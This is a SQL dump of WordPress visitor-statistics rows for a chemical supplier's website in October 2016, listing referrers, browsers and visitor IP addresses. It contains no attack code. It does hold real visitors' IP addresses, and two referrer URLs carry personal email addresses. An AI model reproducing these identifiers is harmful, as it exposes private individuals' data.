INSERT INTO `wp_statistics_visitor` VALUES (3371, '2016-10-12', 'android-app://com.google.android.googlequicksearchbox/httpss/www.google.com', 'Chrome', 'Android', '53.0.2785.124', '', '69.125.152.186', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3372, '2016-10-12', 'https://www.google.com', 'Firefox', 'Windows', '42.0', '', '100.2.225.64', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3373, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '24.37.77.114', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3374, '2016-10-12', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&ved=0ahUKEwih8qHx_9XPAhVHsVQKHUTTCaUQjBAIJTAB&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA', 'MSIE', 'Windows', '11.0', '', '151.163.2.113', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3375, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '45.0.2454.101', '', '72.31.126.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3376, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '192.40.95.9', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3377, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/connector-lubricants/', 'Firefox', 'Windows', '49.0', '', '12.205.160.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3378, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.116', '', '24.149.5.197', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3379, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwj9jIP9gNbPAhWJJIYKHVPrCasYABAE&sig=AOD64_1KVZgvOuta9wxTVwTnzSH22BxJGw&rct=j&q=&ved=0ahUKEwjHgv78gNbPAhXMlx4KHb9zBUUQ0QwIowE&adurl=', 'MSIE', 'Windows', '11.0', '', '67.90.155.30', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3380, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.1.148.130', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3381, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '24.63.154.108', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3382, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '39.0.2171.99', '', '70.181.89.71', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3383, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '64.129.221.34', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3384, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.89.133.116', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3385, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.17', '', '54.157.243.227', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3386, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '74.68.32.161', '000', 18, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3387, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '24.63.154.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3388, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '213.254.241.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3389, '2016-10-12', 'https://www.google.com/url?url=https://www.miller-stephenson.com/miller/pdf/MS-905.pdf&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwim5uzYhtbPAhVESCYKHfQwA08QFggcMAE&usg=AFQjCNElUeNNvDddHo2D7A08I7_k_nbPqw', 'MSIE', 'Windows', '9.0', '', '66.32.17.68', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3390, '2016-10-12', 'https://www.miller-stephenson.com/miller/solvents_cleaners.html', 'Chrome', 'Windows', '53.0.2785.143', '', '108.248.84.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3391, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '30.0.1599.17', '', '54.226.95.145', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3392, '2016-10-12', 'https://www.bing.com/', 'Edge', 'Windows', '14.14393', '', '67.142.112.206', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3393, '2016-10-12', 'https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/', 'Edge', 'Windows', '14.14393', '', '67.142.112.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3394, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '12.175.12.2', '000', 31, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3395, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '66.32.17.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3396, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Macintosh', '53.0.2785.101', '', '188.158.247.140', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3397, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '41.0.2227.1', '', '54.242.162.243', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3398, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '54.242.162.243', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3399, '2016-10-12', 'https://r.search.yahoo.com/_ylt=A0LEVjhdmP5X370AGmEnnIlQ;_ylu=X3oDMTE0Zjc2aGUwBGNvbG8DYmYxBHBvcwM5BHZ0aWQDRkZVSTNDMl8xBHNlYwNzcg--/RV=2/RE=1476331741/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2fkrytox%2f/RK=0/RS=pF2KGNUy3gxAYKwLf8MB6__AbJM-', 'Firefox', 'Windows', '49.0', '', '184.75.235.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3400, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2683.0', '', '97.76.148.98', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3401, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjmkNaSjNbPAhVLl34KHZjHB8YYABAA&sig=AOD64_0nrt63lvPHc4uc4DY7A8HdzIZuGw&rct=j&q=&ved=0ahUKEwjZ09OSjNbPAhXFslQKHeYPCsMQ0QwIWw&adurl=', 'MSIE', 'Windows', '11.0', '', '63.255.202.133', '000', 12, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3402, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3403, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3404, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '72.14.199.79', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3405, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '125.93.83.102', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3406, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '108.81.209.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3407, '2016-10-12', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.11.9600.18449', '', '173.167.26.113', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3408, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.137', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3409, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Android', '44.0.2403.133', '', '166.137.136.59', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3410, '2016-10-12', 'https://www.google.com/aclk?sa=L&ai=DChcSEwib_MvEkdbPAhWGPIEKHRxwBMwYABAA&ei=SaH-V6H5N4m0-AGO4q7gCA&sig=AOD64_34nb2Hz0qmNGCJzeZ99mkivFsPqw&rct=j&q=&sqi=2&ved=0ahUKEwjhwcjEkdbPAhUJGj4KHQ6xC4wQ0QwIGg&adurl=', 'MSIE', 'Windows', '11.0', '', '4.16.119.164', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3411, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.82', '', '140.158.48.75', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3412, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3413, '2016-10-12', 'https://www.bing.com/search?q=EPIKURE%203164%20Polyamide%20Curing%20Agent&qs=n&form=QBRE&pq=epikure%203164%20polyamide%20curing%20agent&sc=0-35&sp=-1&sk=&cvid=8501EB5118D0482890A85037FDCCECEA', 'MSIE', 'Windows', '11.0', '', '40.140.26.106', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3414, '2016-10-12', 'https://www.miller-stephenson.com/product/xp-2a0/', 'Firefox', 'Windows', '48.0', '', '130.199.3.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3415, '2016-10-12', 'https://www.miller-stephenson.com/product/ptfe-release-agents/', 'Safari', 'iPhone', '10.0', '', '70.209.128.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3416, '2016-10-12', 'https://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1207.6EGmflyL55DO6VQ6ltWs4sDgLdH_dauUWn9jbEFdPl-bOvTY1929YivcyxG6mujE.1b691d17cfe6d367c9372e49c911afe42ba774a7&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YMkOSpatjLUqgxH-XWLwn-g&data=UlNrNmk5WktYejR0eWJFYk1LdmtxbWg4V3VrcVZRaW5qSEV5NjF2QkhsZDhTWUNDSHQwZzhUZEJ4Vl9jRFgtVENRU3hKWV9hR2NWel9WWkVkZjNGc1k5NEdPTFM0Um9EM2lOdlBjSHo1RmREbmZFX1dNdHRIdw&b64e=2&sign=670e889f3b02caf0149e60f7b7093a65&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrqPucftfxqCN8vce_V1hDY6YHalC2qyJv0gJXF8LQUCfWJHkGYey2X9gO4hufBU1pO5AXy49ppWj47q08Gb3bWYrb3szB43xwbVETEljjCSQ509csekMs3gGmSxAqWXbe&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCXIWKRFTcvmkyl8uTqWzd7-9vif56XIcDxkUHPJt1SAQzIUmup4lKS6FPupIVH9xqk9f9FJlEACk-ncivjk8jqR8VxHQ9fSTbc&l10n=ru&cts=1476303878579&mc=4.2389347715', 'MSIE', 'Windows', '8.0', '', '37.204.202.203', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3417, '2016-10-12', 'https://search.yahoo.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '131.179.20.105', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3418, '2016-10-12', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '79.116.29.57', '000', 46, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3419, '2016-10-12', 'https://r.search.yahoo.com/_ylt=A0LEVyipp_5XoZ0ABHNXNyoA;_ylu=X3oDMTEyMDNncGFtBGNvbG8DYmYxBHBvcwMxBHZ0aWQDQjE5MTBfMQRzZWMDc3I-/RV=2/RE=1476335657/RO=10/RU=https%3a%2f%2fwww.miller-stephenson.com%2f/RK=0/RS=5QqV3F5yH63GFLQxZEvkBr07ebE-', 'MSIE', 'Windows', '11.0', '', '71.122.253.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3420, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '14.0.835.202', '', '45.17.106.65', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3421, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '52.0.2743.116', '', '104.239.198.201', '000', 28, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3422, '2016-10-12', 'https://www.google.co.id/', 'Chrome', 'Windows', '53.0.2785.143', '', '36.70.38.239', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3423, '2016-10-12', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '24.156.237.138', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3424, '2016-10-12', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.97', '', '199.168.97.28', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3425, '2016-10-12', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '47.138.212.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3426, '2016-10-12', 'https://www.bing.com/search?q=epikure+3140+vs+versamid+140&src=IE-SearchBox&FORM=IESR02', 'MSIE', 'Windows', '11.0', '', '65.114.230.33', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3427, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '208.167.254.235', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3428, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.67.166.46', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3429, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.53.168.119', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3430, '2016-10-12', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '172.56.20.78', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3431, '2016-10-12', 'https://ultramart.biz/', 'MSIE', 'Windows', '6.0', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3432, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.172', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3433, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.51.103', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3434, '2016-10-12', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '13.10586', '', '69.199.244.118', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3435, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '120.76.114.201', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3436, '2016-10-12', 'https://www.miller-stephenson.com', 'XML-RPC', 'Unknown', 'Unknown', '', '120.76.114.201', '000', 4164, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3437, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '32.218.124.241', '000', 55, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3438, '2016-10-12', 'https://www.google.ca/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiP0Oa7p9bPAhUCRj4KHWKmC8oQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2F&usg=AFQjCNEfgJjfAhkA4ZtEWf54OtcSuvhxUw&bvm=bv.135475266,d.cWw', 'MSIE', 'Windows', '11.0', '', '141.119.184.130', '000', 38, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3439, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '196.221.17.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3440, '2016-10-12', 'https://www.miller-stephenson.com/chemicals/solvents/vertrel/', 'Firefox', 'Windows', '49.0', '', '140.252.33.47', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3441, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3442, '2016-10-12', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '24.199.48.74', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3443, '2016-10-12', 'https://www.google.co.uk/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwj1ifHDrNbPAhUIJcAKHUmHDUoQFgg3MAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fvazo-67%2F&usg=AFQjCNFxL21oM9HslAfbWmySnnKUMSYH5A', 'MSIE', 'Windows', '11.0', '', '94.4.213.9', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3444, '2016-10-12', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3445, '2016-10-12', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_October2016&email=carami84%40hotmail.com&eresponse=1&category_id=52031&category_id=52039&category_id=52041&category_id=52037&category_id=52040&category_id=52028&category_id=52035&category_id=52038&category_id=52036&category_id=52029&category_id=52034', 'Chrome', 'Windows', '53.0.2785.143', '', '189.217.236.237', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3446, '2016-10-12', 'https://www.google.com', 'Firefox', 'Windows', '45.0', '', '130.76.186.14', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3447, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '174.219.139.108', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3448, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '67.162.218.144', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3449, '2016-10-12', 'https://www.google.com/', 'Chrome', 'Macintosh', '49.0.2623.112', '', '108.36.232.84', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3450, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '50.49.16.196', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3451, '2016-10-12', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '184.155.195.152', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3452, '2016-10-12', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.153.49.30', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3453, '2016-10-12', 'https://astana.xkaz.org/', 'MSIE', 'Windows', '6.0', '', '178.137.167.230', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3454, '2016-10-12', 'https://www.yellowpages.com/search?search_terms=Chemicals-Wholesale%20%26%20Manufacturers&geo_location_terms=Reseda%2C%20CA&page=2', 'MSIE', 'Windows', '11.0', '', '162.224.233.102', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3455, '2016-10-12', 'https://www.google.com', 'Firefox', 'Windows', '28.0', '', '54.84.142.204', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3456, '2016-10-12', 'https://mfg.regionaldirectory.us/chemicals/connecticut.htm', 'Safari', 'iPhone', '10.0', '', '63.143.234.12', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3457, '2016-10-12', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '6.0.2', '', '180.76.15.29', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3458, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3459, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '53.0.2785.143', '', '104.200.154.33', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3460, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '52.198.240.210', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3461, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '14.36.156.26', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3462, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '45.0', '', '137.78.4.245', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3463, '2016-10-13', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '70.214.32.100', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3464, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '41.0.2228.0', '', '62.210.148.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3465, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.56.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3466, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3467, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '15.0.1', '', '184.173.144.194', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3468, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.129', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3469, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3470, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.130', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3471, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '67.169.80.52', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3472, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '46.0', '', '196.217.14.25', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3473, '2016-10-13', 'https://www.google.ca/', 'Android Browser', 'Android', '4.0', '', '70.79.108.75', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3474, '2016-10-13', 'https://www.google.com/', 'Chrome', 'Windows', '50.0.2661.87', '', '169.234.91.178', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3475, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3476, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'iPad', '9.0', '', '107.3.95.149', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3477, '2016-10-13', 'https://www.miller-stephenson.com/miller/krytox.html', 'Chrome', 'Linux', '39.0.2171.99', '', '217.29.167.157', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3478, '2016-10-13', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Firefox', 'Windows', '44.0', '', '199.168.97.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3479, '2016-10-13', 'https://www.miller-stephenson.com/product/dry-film-mold-release-agent/', 'Chrome', 'Windows', '48.0.2564.109', '', '199.168.97.29', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3480, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '127.0.0.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3481, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '49.0', '', '76.111.223.215', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3482, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3483, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '45.32.129.1', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3484, '2016-10-13', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '140.207.198.197', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3485, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '40.0.2214.115', '', '104.238.180.234', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3486, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.102', '', '47.90.62.142', '000', 48, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3487, '2016-10-13', 'https://chemicalengineering.hotims.com/r5/search.asp?return_by_category=y&action=search-eresp&s_type=&pub_id=224&order_by=&rows_per_page=1000&mc=ChemEng_October2016&email=engtoledoprado%40gmail.com&eresponse=1&category_id=52041', 'Chrome', 'Windows', '53.0.2785.143', '', '189.18.221.53', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3488, '2016-10-13', 'https://www.miller-stephenson.com', 'Edge', 'Windows', '14.14393', '', '73.192.138.107', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3489, '2016-10-13', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3490, '2016-10-13', 'https://www.miller-stephenson.com/', 'MSIE', 'Windows', '9.0', '', '202.102.99.92', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3491, '2016-10-13', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '8.0', '', '52.71.155.178', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3492, '2016-10-13', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '71.211.4.166', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3493, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.51', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3494, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.101', '', '116.226.13.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3495, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '116.226.13.75', '000', 15, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3496, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '50.0.2661.102', '', '210.184.172.251', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3497, '2016-10-13', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '54.148.67.38', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3498, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.169.26.127', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3499, '2016-10-13', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '159.122.133.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3500, '2016-10-13', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '3.0.1', '', '37.218.136.118', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3501, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '172.247.22.223', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (3502, '2016-10-13', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '10.0', '', '23.225.4.156', '000', 1, 0); 
